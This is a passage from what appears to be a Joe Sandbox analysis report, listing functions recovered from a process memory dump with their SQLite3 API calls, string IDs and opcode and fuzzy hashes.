                                                                                                    • Opcode Fuzzy Hash: 9e3f36c4c0fabc8e188632fe39f854cff41fe50b8323668d134924b1423a07d0
                                                                                                    • Instruction Fuzzy Hash: E5315574A083058BD7459F69C58535ABBE2FFC4398F25C42DE8888B788D776D842CB41
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E4476E
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44779
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44832
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4483D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 8d9f026c996acfe03396313e3723e5a837880399c5019ea7917c3c105b3dd969
                                                                                                    • Instruction ID: f809b40cc892d10f9d6bd1d089d48f966c36716b1a6af909635f28d0ea2cd819
                                                                                                    • Opcode Fuzzy Hash: 8d9f026c996acfe03396313e3723e5a837880399c5019ea7917c3c105b3dd969
                                                                                                    • Instruction Fuzzy Hash: 8F215A747086818BE700AF69D48461AFBE5FF89318F24C45EE8488B345D774D852CB82
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E346A7
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E346BF
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E346E2
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34726
                                                                                                    • sqlite3_memory_used.SQLITE3 ref: 61E3472B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                    • String ID:
                                                                                                    • API String ID: 2853221962-0
                                                                                                    • Opcode ID: 4d99d20ecb47e68f5794c1687de86a5643b1c8b6954479f0dec52b203198caed
                                                                                                    • Instruction ID: c8a7a30a255cf5d17eedbeb20707b985c50125413f8d0f8d6aa6408856a5557a
                                                                                                    • Opcode Fuzzy Hash: 4d99d20ecb47e68f5794c1687de86a5643b1c8b6954479f0dec52b203198caed
                                                                                                    • Instruction Fuzzy Hash: 12115A78B14A659BCB14DFBDD44145A77E1BBCB319B64CA2BE864CB344E731E881CB80
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E14567), ref: 61E0A977
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E14567), ref: 61E0A9B3
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E14567), ref: 61E0A9CC
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E14567), ref: 61E0A9DF
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,61E14567), ref: 61E0A9E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 251237202-0
                                                                                                    • Opcode ID: 5f091b8b05422c66fe2bfcc40b35f1953cbd4ee6ed167bd00f2e6e349ecd4a21
                                                                                                    • Instruction ID: 31ab8053d1f8418eccf8b144ded000fe63d5341b70d94186f6e6dd35343b3cb9
                                                                                                    • Opcode Fuzzy Hash: 5f091b8b05422c66fe2bfcc40b35f1953cbd4ee6ed167bd00f2e6e349ecd4a21
                                                                                                    • Instruction Fuzzy Hash: A611F77C568A21DFCF00AFB9C1945147BE6F74638A7558C2BE48887301E738C4D18B42
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37607
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E3761D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E37625
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E37636
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 61E37643
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_blobsqlite3_value_bytessqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 41035782-0
                                                                                                    • Opcode ID: 68226fdcb77abe9e4ba1e847f63606fd8d25044c3f218b14805ccaf3c7bef125
                                                                                                    • Instruction ID: 9857f6d8a8dd9d0602e9d18689bc35c66917b625f3ea8b095df58055d6247abd
                                                                                                    • Opcode Fuzzy Hash: 68226fdcb77abe9e4ba1e847f63606fd8d25044c3f218b14805ccaf3c7bef125
                                                                                                    • Instruction Fuzzy Hash: A001A9706087909FC300AF6CC48060ABAE4AFCA324F64C96DE599CB362C771C881CB96
                                                                                                    APIs
                                                                                                    • sqlite3_randomness.SQLITE3 ref: 61E5465B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_randomness
                                                                                                    • String ID: :$rowid$a
                                                                                                    • API String ID: 2799796375-3478241679
                                                                                                    • Opcode ID: 69d4514a3eb0ffc7e9bfea9f664a44fa60b4814e94fa484129de95c75ca36cff
                                                                                                    • Instruction ID: 870e262e67d79c3937e4883651f0646503c36c1edebc875c16f81a8d2d6ad6c5
                                                                                                    • Opcode Fuzzy Hash: 69d4514a3eb0ffc7e9bfea9f664a44fa60b4814e94fa484129de95c75ca36cff
                                                                                                    • Instruction Fuzzy Hash: 48517BB0A08249CBEB40CFA9C48079DBBF5AF89308F24C56ED9159B355E776D822CB51
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E368F0
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3691C
                                                                                                      • Part of subcall function 61E366E6: sqlite3_vmprintf.SQLITE3 ref: 61E366FF
                                                                                                      • Part of subcall function 61E366E6: sqlite3_mprintf.SQLITE3 ref: 61E3671D
                                                                                                      • Part of subcall function 61E366E6: sqlite3_free.SQLITE3 ref: 61E36729
                                                                                                      • Part of subcall function 61E366E6: sqlite3_free.SQLITE3 ref: 61E36731
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                                    • String ID: AND$NOT
                                                                                                    • API String ID: 966554101-2843896482
                                                                                                    • Opcode ID: 7e18db9d6d2fd0ddda107c3720857c3b29ebbeb57157de8c75f588e1058a5517
                                                                                                    • Instruction ID: 1f6ccf8a60ca6947d3799fbc44a6c248b07409c7d8f35210efc9e85b76271ed9
                                                                                                    • Opcode Fuzzy Hash: 7e18db9d6d2fd0ddda107c3720857c3b29ebbeb57157de8c75f588e1058a5517
                                                                                                    • Instruction Fuzzy Hash: 165115B0A087A29BD7119FB9C68126ABBF5AFCC344F70C82DD49987340E734D942DB42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintf
                                                                                                    • String ID: NEAR$phrase
                                                                                                    • API String ID: 1840970956-1639708222
                                                                                                    • Opcode ID: ceffcea6f17c9df09fe4b733a4ee3b5d3098670f4b82ec2fa511aabc30688a43
                                                                                                    • Instruction ID: 51c599023d73b1a1eef690347da712f483f2865e6c4af472e5ff1be824d74c3b
                                                                                                    • Opcode Fuzzy Hash: ceffcea6f17c9df09fe4b733a4ee3b5d3098670f4b82ec2fa511aabc30688a43
                                                                                                    • Instruction Fuzzy Hash: 9B515870A042158FDB98EF98C4C0749BBB1AB45319F31C969D8288F315D377E8A2CF81
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6DB92
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6DBBC
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6DD20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                    • String ID: a
                                                                                                    • API String ID: 1664011779-581836851
                                                                                                    • Opcode ID: d2e317a55e3bd061cb4d74ab1d76da1edc3110a2e381a81b74e13c86787b2679
                                                                                                    • Instruction ID: 044f17fd799ab27eb5a9b88995d4a7752ff34cf3d6dbe4b6a1a57db9257f1b5c
                                                                                                    • Opcode Fuzzy Hash: d2e317a55e3bd061cb4d74ab1d76da1edc3110a2e381a81b74e13c86787b2679
                                                                                                    • Instruction Fuzzy Hash: AF513874A042468FE704CFA9C484B9ABBF5BF88318FA5C56DD8588F359D7B8D841CB90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                    • String ID: winAccess
                                                                                                    • API String ID: 2284118020-3605117275
                                                                                                    • Opcode ID: 05eb1fa3807a9a2cdc6c4a03021d76eefac99b75506ff13cdcc2fb3ebc61b860
                                                                                                    • Instruction ID: e78bd91333765150167c56f522195f64759cf503265f1a019a1652df6870c95e
                                                                                                    • Opcode Fuzzy Hash: 05eb1fa3807a9a2cdc6c4a03021d76eefac99b75506ff13cdcc2fb3ebc61b860
                                                                                                    • Instruction Fuzzy Hash: FC318F71904299CFDB10DFA4C86075EB7B5EB89368F21C729EC6897380DB30DA46CB42
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38368
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38388
                                                                                                    • sqlite3_result_value.SQLITE3 ref: 61E383D0
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_mprintf.SQLITE3 ref: 61E37D14
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_result_error.SQLITE3 ref: 61E37D2A
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_free.SQLITE3 ref: 61E37D32
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                                    • String ID: replace
                                                                                                    • API String ID: 822508682-211625029
                                                                                                    • Opcode ID: 6cf1a91bab59914e43501d3e826ceaac5c492d2d98acdb018e458936ed1deece
                                                                                                    • Instruction ID: 522ab27d044b8e49858aff03670968573dda79ca924cba1fe7709a71c83270fb
                                                                                                    • Opcode Fuzzy Hash: 6cf1a91bab59914e43501d3e826ceaac5c492d2d98acdb018e458936ed1deece
                                                                                                    • Instruction Fuzzy Hash: A7213D71A083599BCB01DF64C484A9EBBE5AFC5358F24C61AEC88CB360D775E984DB81
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1C124
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 61E1C172
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E1C188
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                    • String ID: d
                                                                                                    • API String ID: 211589378-2564639436
                                                                                                    • Opcode ID: 164bb4ca26bcaafdd86527c739e27112bd78e3eb4005f50f429b6ba42670d887
                                                                                                    • Instruction ID: e294e323448624470513dc4597db27ad79ab5d549741f3728edb587babaf0442
                                                                                                    • Opcode Fuzzy Hash: 164bb4ca26bcaafdd86527c739e27112bd78e3eb4005f50f429b6ba42670d887
                                                                                                    • Instruction Fuzzy Hash: 5021D4B5A04245CFDB10CF69C8C1B59BBF4AF89314F14846AC9489B319D778E845CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                    • String ID: <
                                                                                                    • API String ID: 2918918774-4251816714
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28B6C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28C1F), ref: 61E28BA7
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E28CAB
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E28CC4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28CDE
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                    • String ID: out of memory
                                                                                                    • API String ID: 645246966-2599737071
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                    • API String ID: 1646373207-328863460
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1F525
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E1F63C
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E1F75F
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F774
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                    • String ID:
                                                                                                    • API String ID: 4229029058-0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                    • String ID:
                                                                                                    • API String ID: 2374424446-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E18F76: sqlite3_malloc.SQLITE3 ref: 61E18FA3
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E350CF
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E35102
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3519A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3567284914-0
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E2064B
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_value_dup.SQLITE3 ref: 61E206A2
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E206D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                    • String ID:
                                                                                                    • API String ID: 405757302-0
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E384F9
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E38519
                                                                                                    • sqlite3_vfs_find.SQLITE3 ref: 61E38558
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E38657
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                    • String ID:
                                                                                                    • API String ID: 321126751-0
                                                                                                    • Opcode ID: 75f913a692ebbf3322899adf995a39d6d527309c5dcb481c6be6e0cb7d85c82a
                                                                                                    • Instruction ID: aa39cdd9b86109e2ca21f447c6fe64077844254f741ca312e365dad5f72f17c1
                                                                                                    • Opcode Fuzzy Hash: 75f913a692ebbf3322899adf995a39d6d527309c5dcb481c6be6e0cb7d85c82a
                                                                                                    • Instruction Fuzzy Hash: 02416E388182F8DEC7279B6885447D97FF0EF96728F1889DAD8C48B342C674C189DB51
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_errorsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252562485-0
                                                                                                    • Opcode ID: 2a995baf9ea799b2c027598a2dac51f172a1810de91341bb32531ad618bdd50e
                                                                                                    • Instruction ID: ffd037f6e07576975daa33f9a144366cd64a138a7f33f08dd189ce681e79ce28
                                                                                                    • Opcode Fuzzy Hash: 2a995baf9ea799b2c027598a2dac51f172a1810de91341bb32531ad618bdd50e
                                                                                                    • Instruction Fuzzy Hash: DA3115B4A057089FD764CF68C480B4ABBF0BB89318F20C89EE49C87340D736E9908F42
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C4A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C52
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C65
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                      • Part of subcall function 61E09D2A: sqlite3_free.SQLITE3 ref: 61E09D3F
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52CA3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3930042888-0
                                                                                                    • Opcode ID: 96e98b8956901f6b9b2a079876b3ba6faab719e37a02f0d546edafe197bc5e0a
                                                                                                    • Instruction ID: d3838116262026a2576d46da45916ac8ca94dce865288db080a8f2e10138453f
                                                                                                    • Opcode Fuzzy Hash: 96e98b8956901f6b9b2a079876b3ba6faab719e37a02f0d546edafe197bc5e0a
                                                                                                    • Instruction Fuzzy Hash: F421BD70A04607CBCB48DFF9C48065AB7F1BFA8314B35C529D819AB302E736D8618B90
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E143EF
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E14446
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E14463
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E1448A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 14d1f52052599e6e87cd15f8626e7d7449232861e5fd47ac855b7d0342c00947
                                                                                                    • Instruction ID: 8414b4b181cb129c6513d0de0f968458bb4277310e31e37fb9f3b457c601f75b
                                                                                                    • Opcode Fuzzy Hash: 14d1f52052599e6e87cd15f8626e7d7449232861e5fd47ac855b7d0342c00947
                                                                                                    • Instruction Fuzzy Hash: DD116D7965CA618FCF00AFB8C19161977F6BB4638DB24882BE544CB304D778D8928B52
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3779612131-0
                                                                                                    • Opcode ID: 51bfe0574f5018e4c5c3c7389dfb0f605030b59e5b1e22246a1608c3533ae4e8
                                                                                                    • Instruction ID: 9ed1560be681974ba9bf33d831e90ec066c50c17333a1ed0b9c81d882438538a
                                                                                                    • Opcode Fuzzy Hash: 51bfe0574f5018e4c5c3c7389dfb0f605030b59e5b1e22246a1608c3533ae4e8
                                                                                                    • Instruction Fuzzy Hash: 2A114F716047499BDB109F69C89529ABBA0FB48334F24C62AF9688F780D334D551CB91
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12FFA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E13048
                                                                                                      • Part of subcall function 61E10406: sqlite3_mutex_enter.SQLITE3 ref: 61E10445
                                                                                                      • Part of subcall function 61E10406: sqlite3_mutex_leave.SQLITE3 ref: 61E104ED
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E1306C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E1308D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 2033adb37c03a6018db83bb2d30fb59c042848445298035b96ae5ec3f664ccb0
                                                                                                    • Instruction ID: 86bf3e2f7d39f2492dd2b7459389fd2d71b1b89993e6ff619c0031f20feeb8ce
                                                                                                    • Opcode Fuzzy Hash: 2033adb37c03a6018db83bb2d30fb59c042848445298035b96ae5ec3f664ccb0
                                                                                                    • Instruction Fuzzy Hash: A3115EB8718B518BEB00EFB8C5C261977E5B786319F24892EE484CB309D775E8C18B52
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37FEC
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E38006
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3800E
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E38018
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3282944778-0
                                                                                                    • Opcode ID: 83f06fa11a10496968ac0b5c231d65013cdb30151e9c6c1c95c6259f9df7b5ba
                                                                                                    • Instruction ID: e625cb65426cb0b0d6cb01cb5bdeba0cf8e59a092c4cad8ff250daa883f46644
                                                                                                    • Opcode Fuzzy Hash: 83f06fa11a10496968ac0b5c231d65013cdb30151e9c6c1c95c6259f9df7b5ba
                                                                                                    • Instruction Fuzzy Hash: 9E018E748087568BE7109F65C44065EFBF4AFC8324F20C62DE8A887340E734C582DF92
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87985
